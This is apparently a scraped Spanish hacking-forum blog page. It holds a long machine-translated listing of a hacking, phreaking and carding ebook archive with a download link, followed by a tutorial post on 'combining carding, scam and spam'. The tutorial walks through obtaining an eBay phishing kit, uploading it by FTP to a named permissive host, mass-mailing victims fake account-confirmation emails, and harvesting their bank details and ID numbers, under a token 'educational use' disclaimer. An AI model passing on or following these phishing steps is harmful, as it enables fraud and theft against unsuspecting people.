M·s Hacking/NY_2 'S GuÌa para obtener una direcciÛn IP. . doc 10,50 kB 
M·s Hacking / An·lisis de organizaciÛn en Inform·tica Science.txt 65,00 kB 
M·s Hacking / SUPREM ~ 1.TXT 56,70 kB 
M·s Hacking / paquete TCP fragmento ataques contra los cortafuegos y filters.txt 4,39 kB 
M·s Hacking / Telenet-The Secret Exposed.txt 9,91 kB 
M·s Hacking / Lo B·sico de Hacking-Introduction.txt 24,82 kB 
M·s Hacking / Baudy El Mundo del Byte Bandit-A posmoderno Interpreta.txt 85,17 kB 
M·s Hacking / La ConstituciÛn en Cyberspace.txt 46,60 kB 
M·s Hacking / El ***** ciÛn Manual.txt 86,38 kB 
M·s Hacking / la comunicaciÛn electrÛnica del Acta de Privacidad de 1986 - Un Laymans. Txt 10,04 kB 
M·s Hacking / El mejor Hacker de todos los time.ASC 25,02 kB 
M·s Hacking / El Hacker's League.txt 12,37 kB 
M·s Hacking / Inner Circle El Libro del Hacking Techniques.txt 1,96 kB 
M·s Hacking / El Lamahs-GuÌa para la piraterÌa de software en el Internet.txt 12,21 kB 
M·s Hacking / El M.M.C. GuÌa de Hacking, phreaking, Carding.txt 19,11 kB 
M·s Hacking / El Consejo Nacional de Infraestructura de la InformaciÛn-Programa de Action.txt 96,49 kB 
M·s Hacking / Newbies El Manual-'CÛmo beging en el Mundial de Hacking.txt 43,83 kB 
M·s Hacking / Newbies-La GuÌa del usuario para Hacking.txt 47,35 kB 
M·s Hacking / La Pre-Historia de Cyberspace.txt 60,25 kB 
M·s Hacking / El precio del derecho de autor Violation.txt 73,11 kB 
M·s Hacking / La verdadera manera de cortar RemoteAccess.txt 12,12 kB 
M·s Hacking / El Servicio Secreto, UUCP, y La LegiÛn de Doom.txt 19,63 kB 
M·s Hacking / el sistema operativo UNIX (Berkley 4.2). Txt 13,55 kB 
M·s Hacking / El robo de programas inform·ticos-A de Seguridad Nacional Threat.txt 12,22 kB 
M·s Hacking / Reflexiones sobre el Consejo Nacional de InvestigaciÛn y EducaciÛn Network.txt 19,72 kB 
M·s Hacking / Consejos a partir de los tuyos BBS.1 8,04 kB 
M·s Hacking / DOS indocumentados commands.txt 23,17 kB 
M·s Hacking / UNIX Seguridad Checklist.0 49,34 kB 
M·s Hacking / UNIX de uso y de Seguridad - Por la Prophet.txt 153,74 kB 
M·s Hacking / UNIX de uso y de Seguridad de la tierra Up.htm 135,60 kB 
M·s Hacking/UNIX- Un Hacking Tutorial.SIR 82,26 kB 
M·s Hacking / Viruii FAQ.txt 4,07 kB 
M·s Hacking / Virus-Trojan FAQ.txt 1,95 kB 
M·s Hacking / øQuÈ archivos se jurÌdico para su distribuciÛn en un 20,83 KB BBS.txt 
M·s Hacking / QuÈ buscar en un cÛdigo hacking Program.htm 5,56 kb 
M·s Hacking / QuÈ buscar en un cÛdigo hacking Program.txt 5,46 kb 
M·s Hacking / Lo que usted debe saber sobre el ordenador Viruses.DNA 16,91 kB 
M·s Xp Trucos y consejos para que su equipo pueda m·s faster.txt 46,14 kB 
Mover y eliminar la de inicio Button.txt 0,66 kB 
MSN Messenger y Gmail.txt 3,69 kB 
Mis favoritos de Flash, larga lista de tutorials.txt 2,98 kB 
Mito acerca de WPA (øcÛmo se hace), Windows Product Activation Technique.txt 45,54 kB 
Nero cÛmo verificar la validez de la U sn Use.txt 0,88 kb 
Nueva Hacking ebooks / A Basic UNIX Overview.rtf 22,46 kB 
Nueva Hacking ebooks / Una guÌa para principiantes Hacking Unix.txt 6,05 kb 
Nueva Hacking Ebooks / A Novicio's Guide to Hacking 2004.txt 40,75 kB 
Nueva Hacking Ebooks / A Novicio's Guide to Hacking.txt 8,58 kB 
Nueva Hacking ebooks / A corto uso de la palabra hacker Glossary.txt 9,78 kb 
Nueva Hacking Ebooks / A simple TCP spoofing attack.txt 14,60 kB 
Nueva Hacking Ebooks / Acceso a los archivos de Bindery directly.txt 3,97 kB 
Nueva Hacking Ebooks / Un panorama arquitectÛnico de red UNIX Security.htm 53,27 kB 
Nueva Hacking Ebooks / El anonimato completo GUIDE.rtf 28,90 kB 
Nueva Hacking Ebooks / AN”NIMO emails.txt 3,15 kB 
Nueva Hacking Ebooks / FTP anÛnimo FAQ.htm 28,14 kB 
Nueva Hacking ebooks / ANSIBombs II consejos y Techniques.txt 10,05 kB 
Nueva Hacking Ebooks / ataques a las redes de cÛmo stop.htm 67,77 kB 
Nueva Hacking Ebooks / Backdoor.txt 18,71 kB 
Nueva Hacking Ebooks / Backdoors.txt 19,15 kB 
Nueva Hacking Ebooks / BBS estrellarse TECHNIQUES.txt 3,72 kB 
Nueva Hacking Ebooks / Busto Para Evitar ~ ~ censurado. Txt 5,82 kB 
Nueva Hacking Ebooks / Firewall de ProtecciÛn de cÛmo to.rtf 33,12 kB 
Nueva Hacking Ebooks / GuÌa de Hacking con sub7.doc 106,00 kB 
Nueva Ebooks Hacking / hacking y phreaking.doc 168,00 kB 
Nueva Ebooks Hacking / Hacking para los simulado Tomo 2.doc 147,00 kB 
Nueva Ebooks Hacking / Hacking Para Newbies.doc 54,00 kB 
Nueva Ebooks Hacking / hacking telnet en ftp.rtf 57,47 kB 
Nueva Ebooks Hacking / hacking en Telnet explained.doc 16,25 kB 
Nueva Ebooks Hacking / Hacking El 1-5/hacking XP XP en parte 1.doc 4,58 kB 
Nueva Ebooks Hacking / Hacking El 1-5/hacking XP XP en parte 2.doc 8,25 kB 
Nueva Ebooks Hacking / Hacking El 1-5/hacking XP XP en parte 3.doc 4,51 kB 
Nueva Ebooks Hacking / Hacking El 1-5/hacking XP XP en parte 4.doc 0,00 kB 
Nueva Ebooks Hacking / Hacking El 1-5/hacking XP XP en parte 5.doc 0,00 kB 
Nueva Ebooks Hacking / hacking protegido con contraseÒa site.doc 26,50 kB 
Nueva Ebooks Hacking / Hacking sitio web protegido con contraseÒa. Doc 3,06 kB 
Nueva Ebooks Hacking / hacking passwords.doc 26,50 kB 
Nueva Hacking Ebooks / øCÛmo aprender a cortar f·cil steps.doc 100,00 kB 
Nueva Hacking Ebooks / øCÛmo usar la Web para buscar informaciÛn sobre hacking.doc 16,28 kB 
Nueva Hacking Ebooks / IP cÛmo to.rtf 5,15 kB 
Nueva Hacking Ebooks / netbios explained.doc 26,68 kB 
Nueva Hacking Ebooks / Proxy cÛmo to.rtf 3,13 kB 
Nueva Hacking Ebooks / Routing Basics.pdf 30,25 kB 
Nueva Hacking Ebooks / puerto telnet truco 25.doc 1,76 kB 
Nueva Hacking Ebooks / Yahoo Chat Comandos cÛmo to.rtf 0,93 kB 
Nueva Pc o Nueva Motherboard.txt 3,77 kb 
Nueva manera de revivir algunos Zinio fichero.txt 1,95 kb 
grupos de noticias la forma de do.txt 11,40 kB 
Niza, lista de ventanas shortcuts.txt 7,50 kB 
No Texto Icons.txt 0,29 kB 
TamaÒo de Cluster ntfs, mejor disco duro performance.txt 1,34 kB 
Oficial desatendida xp cd xp GuÌa Sp2 @Msfn.org.txt 0,91 kb 
Abra el Explorador de Windows a otra por defecto Direc.txt 0,74 kb 
Optimizar la banda ancha y DSL Connections.txt 1,91 kB 
Optimizar Emule Connection.txt 1,20 kB 
Outpost Reglamento, las normas de Outpost sistema y app.txt 7,32 kB 
Sistema de archivos m·s vivo que Protection.txt 5,37 kB 
Overclocking_Tutorial.txt 7,67 kB 
Los ataques de paquetes - VersiÛn 1,1, () Packet_Attack_Exlained. Txt 25,94 kB 
Parte 0 DC + +. Txt 4,11 kB 
Parte 1 Bittorrents.txt 4,19 kB 
Parte 2 IRC (mirc). Txt 4,91 kB 
Parte 3 Ftp.txt 2,71 kB 
El particionado de su disco duro con fdisk.txt 2,13 kb 
Pc extensiÛn del archivo Listing.txt 26,48 kB 
Pc Mantenimiento Guide.txt 10,20 kB 
Peer2mail Tutorial.txt 9,37 kB 
Aumentar el rendimiento a travÈs de mi Computer.txt 0,53 kb 
Phreaking/2600 Hertz ?nico generador de tonos Schematic.txt 1,95 kb 
Phreaking / A la lista de todos los Telenet cÛdigo que existe is.txt 1,96 kB 
Phreaking / Una lista de BBS Gobierno Numbers.txt 13,07 kB 
Phreaking / una extensa GuÌa de Bell System Man Holes.txt 10,10 kB 
Phreaking / Una introducciÛn en TeleScan.txt 3,98 kB 
Phreaking / una guÌa introductoria sobre la Telenet Commands.txt 2,20 kb 
Phreaking / de zona y hora Zones.txt 4,90 kB 
Phreaking / Convertirse en un Phreaker - El Quick n 'Easy Way.txt 17,09 kB 
Phreaking / Hell Bell Tomo # 1.txt 10,29 kB 
Phreaking / Hell Bell Tomo # 2.txt 15,92 kB 
Phreaking / Breaker B0X.txt 1,96 kB 
Phreaking / busybox.txt 1,61 kB 
Phreaking / Celular Escuchar con un televisor. Txt 1,96 kB 
Phreaking / TelÈfono Celular phreaking Phile Series VOL 1.txt 10,00 kB 
Phreaking / Drake 's phreaking Tutorial.txt 3,34 kB 
Phreaking / Hacking VoiceMail Systems.txt 25,89 kB 
Phreaking / øCÛmo BT tarjetas telefÛnicas works.txt 4,18 kB 
Phreaking / Phone Phreaks CÛmo se Caught.txt 12,00 kB 
Phreaking / CÛmo Bill todas sus Fone Pide a algunos pobres, Unsuspecting.txt 11,38 kB 
Phreaking / øCÛmo hacer un telÈfono gratuito Call.txt 2,16 kB 
Phreaking / CÛmo poner fin a no deseadas o Acosar TelÈfono Calls.HAR 12,10 kB 
Phreaking / Sistemas de TelÈfono Tutorial de El Jolly Roger.txt 8,68 kB 
Phreaking / Phreakers Handbook.txt 9,83 kB 
Phreaking / Quick TelÈfono Modifications.txt 4,12 kB 
Phreaking / El ABC de TelÈfonos de pago de parte 1.txt 2,58 kB 
Phreaking / El ABC de TelÈfonos de pago de parte 2.txt 2,12 kB 
Phreaking / El ABC de TelÈfonos de pago de parte 3.txt 2,21 kB 
Phreaking / El ABC de TelÈfonos de pago de parte 4.txt 2,64 kB 
Phreaking / La caja beige. Txt 6,23 kB 
Phreaking / La historia de British Phreaking.htm 8,29 kB 
Phreaking / El M.M.C. GuÌa de Hacking, phreaking, Carding.txt 19,11 kB 
Phreaking / El Moterola Bible.txt 116,99 kB 
Phreaking / El mito del detector de 2600Hz. Txt 6,55 kB 
Phreaking / The Official Phreaker's Manual.txt 499,25 kB 
Phreaking / Phreakers El Manual-1.txt 62,87 kB 
Phreaking / El TelÈfono Works.txt 9,25 kB 
Phreaking / phreaking The Ultimate Guide. Txt 1,96 kB 
Phreaking / Entender el TelÈfono System.txt 16,34 kB 
Phreaking / Zen y el Arte de phreaking Fone `97. Txt 66,74 kB 
Jugar juegos en PS2 sin ModChip.txt 5,37 kb 
A jugar en Bnet emulador, y f off cd key = verificar). Txt 1,81 kB 
Puerto Numbers.txt 40,19 kB 
Problema con la navegaciÛn de internet, limpio de acogida fichero.txt 0,47 kb 
Quick Fix para el software espÌa, prueba antes de hacer esta cirugÌa en su OS.txt 1,77 kb 
R·pida Msc.txt 0,50 kB 
Apagado r·pido para XP, øCÛmo crear un atajo de cierre .. txt 0,54 kB 
R·pidamente iniciar la carpeta compartida Wizard.txt 0,40 kb 
Rapidshare hack !!!!! Free acount prima para all.txt 3,08 kB 
Rapidshare hackeado, ilimitado cargar, no countdown.txt 1,72 kB 
Rapidshare Timelimit.txt 0,98 kB 
Lea esto! Av Compare!. Txt 7,56 kB 
Recuperar un sistema corrupto fichero.txt 1,10 kb 
Recuperar un r·pido borrado de CD RW.txt 3,89 kB 
Reformatear y Reinstall.txt 2,58 kB 
Regedit.exe y REGEDT32.EXE, ødifference.txt 2,87 kB 
Registro desmontadas b·sico tutorial.txt 7,10 kB 

Aqui les dejo la Descarga. 

Descarga: 

http://www.ziddu.com/downloa....ar.html 

Espero que les sirva. !  


Fuente : http://hackxcrack.es/foro/index.php?topic=2245.0

COMBINANDO ARTES " CARDING , SCAM , SPAM  

Posted by ShadinessDark in

ola banda bueno esto enrealidad nose si considerarlo un tutorial pero en este escrito pasare a explicar un poco como hacerte con los datos vancarios de tu victima . 

ESTA TUTO ES DE USO EDUCATIVO Y ILUSTRATIVO POR LO QUE NI EL FORO " HackXcracK " NI YO NOS HACEMOS RESPONSABLEES DE UN MAL USO DE ESTA INFORMACION 

utilizaremos: 

scam de ebay 
mailer 
host 
filezilla 

scam de ebay: hay varios por la red no pondre un link de descarga ( no fomento esta actividad ) si necesitan alguno pidanmelos por mp y se los pasare con gusto 

mailer: lo utilizaremos para mandar correos a nuestra victima con publicidad que nosotros pongamos en nuestro scam 

host: lo utilizaremos para subir nuestro scam a la red ( no todos los host permiten este tipo de scam por lo que o no funcionan o directamente los bloquea ) 

un host que si permite este tipo de actividades es www.ohost.de "crearos una cuenta" 

buen tras crear una cuenta descargamos filezilla para poder acceder por ftp y asi subir el scam de ebay ya configurado a nuestro gusto una vez ya lo tenemos subido usaremos un mailer que subiremos a ese mismo host ya que tambien lo permite 

mandamos varios correos a nuestras victimas solicitandoles desde confirmar su cuenta asta publicidad con productos a muy buen precio 

acontinuacion de la solicitud de confirmacion de la cuenta etc.. poner un link a nuestro scam . 

tu victima accedera y rellenara sus datos y tu podras recojer esos datos luego lo que hacer con esos datos es cosa de cada uno . 

este tuto tiene doble sentido no solo enseñaros como de facil es conseguir informacion tan comprometedora como los datos vancarios , DNI etc.. sino para que ustedes se den cuenta cuando esten en frente de uno de estos delitos. 

paz y amor salu2 

Fuente: http://hackxcrack.es/foro/index.php?topic=7114.0


Efecto Neon - Photoshop  

Posted by ShadinessDark in

Imagen Abstracta - Photoshop  

Posted by ShadinessDark in


Hacer Firmas  

Posted by ShadinessDark in



Dedicado especialmente para Barcelona